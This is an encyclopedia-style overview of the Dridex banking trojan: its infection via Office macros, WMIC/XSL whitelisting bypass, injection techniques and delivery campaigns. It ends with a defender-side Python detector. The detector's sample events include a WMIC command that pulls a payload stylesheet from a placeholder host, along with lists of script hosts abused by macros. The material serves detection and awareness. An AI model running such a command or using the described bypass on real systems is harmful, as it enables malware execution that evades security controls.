Dridex Trojan

Dridex, also known as Bugat and Cridex, is a form of malware that specializes in stealing bank credentials via a system that utilizes macros from Microsoft Word.

The targets of this malware are Windows users who open an email attachment in Word or Excel, causing macros to activate and download Dridex, infecting the computer and opening the victim to banking theft.

The primary objective of this software is to steal banking information from users of infected machines in order to immediately launch fraudulent transactions. To capture that banking information, the software installs a keyboard listener (keylogger) and performs web injection attacks.

First spotted in 2014, the malware’s developers appear to be very active and are constantly evolving the software’s capabilities and attack vectors.

In January last year, researchers from Forcepoint Security Labs found that Dridex had expanded its infection chain by targeting users not only through phishing campaigns but also via compromised FTP sites.

The latest strain of the malware was first detected by cybersecurity researcher Brad Duncan. According to Duncan, the new Trojan variant makes use of an application whitelisting bypass technique that sidesteps controls applied to the Windows Script Host.

By exploiting what can be considered weak execution protection and policies in the Windows WMI command-line (WMIC) utility, the malware can employ XSL scripts to bypass mitigation efforts.

Dridex has also ramped up its library infrastructure. The security researcher says the Dridex DLL files are 64-bit DLLs — with associated SHA256 hashes — which use file names that are loaded by legitimate Windows executables. However, the file names and hashes are refreshed and changed every time a victim logs into an infected Windows host.

Cybersecurity firm eSentire said that the core functionality of Dridex has received an additional upgrade and provided additional details relating to the new strain.

Dridex is an evolution of the Cridex malware, which itself is based on the ZeuS Trojan Horse malware. According to security firm Trustwave, the Dridex banking malware initially spread in late 2014 via a spam campaign that generated upwards of 15,000 emails each day. The attacks primarily focused on systems located in the United Kingdom.

In October 2015, the United States Department of Homeland Security (DHS), in collaboration with the Federal Bureau of Investigation (FBI) and the Department of Justice (DOJ) released a Technical Alert about the Dridex trojan.

According to the alert, Dridex is capable of stealing user credentials, keystroke logging, and web injects. This trojan has been used in various campaigns that launch distributed denial-of-service (DDoS) attacks and harvest users’ banking credentials.

According to a technical report published by Symantec, the Dridex trojan is capable of targeting 300 different organizations in over 40 regions.

Dridex version v.3.161

Dridex version v.3.161 was first spotted on January 06, 2016. This new version was then used in redirection attack campaigns targeting the United Kingdom. The spam campaign included a Microsoft Office file attachment disguised as an invoice. Upon opening the attachment, the Dridex trojan is downloaded onto the compromised computer.

Dridex distributes Locky ransomware

In March 2016, researchers observed Dridex trojan distributing the Locky Ransomware via JavaScript attachments. Once dropped, Locky ransomware encrypts all the files and leaves a ransom note behind.

Dridex targets US banks

Researchers noted that the Dridex trojan has shifted its focus away from European users. The trojan has evolved to target US banks. Its targets include U.S. bank accounts, users of social media sites, credit card companies, and financial investment corporations.

AtomBombing technique

Researchers spotted a new version of the Dridex banking trojan, Dridex version 4. This new version uses a new injection method based on the “AtomBombing” technique to evade antimalware solutions. This version was observed in malware campaigns against UK banks.

Connections with BitPaymer ransomware

Researchers spotted code similarities between the Dridex Trojan and BitPaymer ransomware. They analyzed samples of FriedEx, also known as BitPaymer, and found that BitPaymer uses the same techniques as Dridex to hide as much information as possible about its behavior.

Whitelisting bypass technique

Security researchers identified a new variant of the Dridex trojan that uses an application whitelisting bypass technique to avoid mitigation applied through the Windows Script Host. This variant was distributed via a malspam campaign carrying malicious Word documents.

Dridex distributed via Spelevo exploit kit

In June 2019, researchers observed a cyberespionage campaign that distributed a newly discovered exploit kit named Spelevo. Once installed, the exploit kit first attempts to exploit the CVE-2018-15982 vulnerability in Adobe Flash Player and then checks for an Internet Explorer installation vulnerable to the use-after-free bug CVE-2018-8174. The Spelevo exploit kit was used by attackers to deliver two banking trojans: IcedID and Dridex.

Malspam campaign delivers Dridex Trojan and RMS RAT

In July 2019, researchers observed a new malspam campaign that delivers the Dridex banking trojan and RMS RAT via malicious Microsoft Office document attachments. The phishing emails include malicious ZIP archives containing XLS (Microsoft Excel) documents disguised as fake eFax messages. The malicious documents are embedded with a macro designed to download and launch the Dridex Trojan and RMS RAT. Upon execution, the Dridex trojan collects credentials from web browsers, while the RMS RAT provides remote control of the infected systems.
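As an added defender-side example (not code from this page or from any of the researchers it cites), the following Python checks constructed process-creation events for the two behaviours described above: an Office application spawning a scripting or WMI host (the macro-based infection chain) and WMIC being invoked with a /format: stylesheet that is remote or outside its standard directory (the whitelisting bypass). The event fields, paths and sample command lines are assumptions.

```python
import re
from typing import Dict, List

# Office parents that should not normally launch script/WMI hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children commonly used by macros to stage a download; includes WSH and WMIC.
SCRIPT_CHILDREN = {"wmic.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                   "cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"}
# WMIC's /format: argument; the stylesheet may be quoted or bare.
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)
# Directory holding WMIC's legitimate built-in stylesheets (assumed default install).
WBEM_DIR = "c:\\windows\\system32\\wbem\\"

# Constructed Sysmon-style events; none of these come from a real host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"http://example.invalid/payload.xsl"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic logicaldisk get name /format:csv"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\invoice.js"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic process list /format:"C:\\Windows\\System32\\wbem\\csv.xsl"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"C:\Users\Public\inv.xsl"'},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the list of detection reasons that fire for one event."""
    reasons: List[str] = []
    parent, image = basename(event["parent"]), basename(event["image"])
    if parent in OFFICE_PARENTS and image in SCRIPT_CHILDREN:
        reasons.append(f"office-spawn:{parent}->{image}")
    if image == "wmic.exe":
        match = FORMAT_RE.search(event["cmdline"])
        if match:
            target = match.group(1).lower()
            builtin = "\\" not in target and "/" not in target and not target.endswith(".xsl")
            if target.startswith(("http://", "https://", "\\\\")):
                reasons.append("wmic-remote-xsl")       # stylesheet fetched over the network
            elif not builtin and not target.startswith(WBEM_DIR):
                reasons.append("wmic-nonstandard-xsl")  # local stylesheet outside wbem dir
    return reasons

def detect(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> reasons for every event that triggers at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := classify(ev))}
```

Running `detect(SAMPLE_EVENTS)` flags events 0, 2 and 4 and leaves the two benign WMIC invocations alone.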
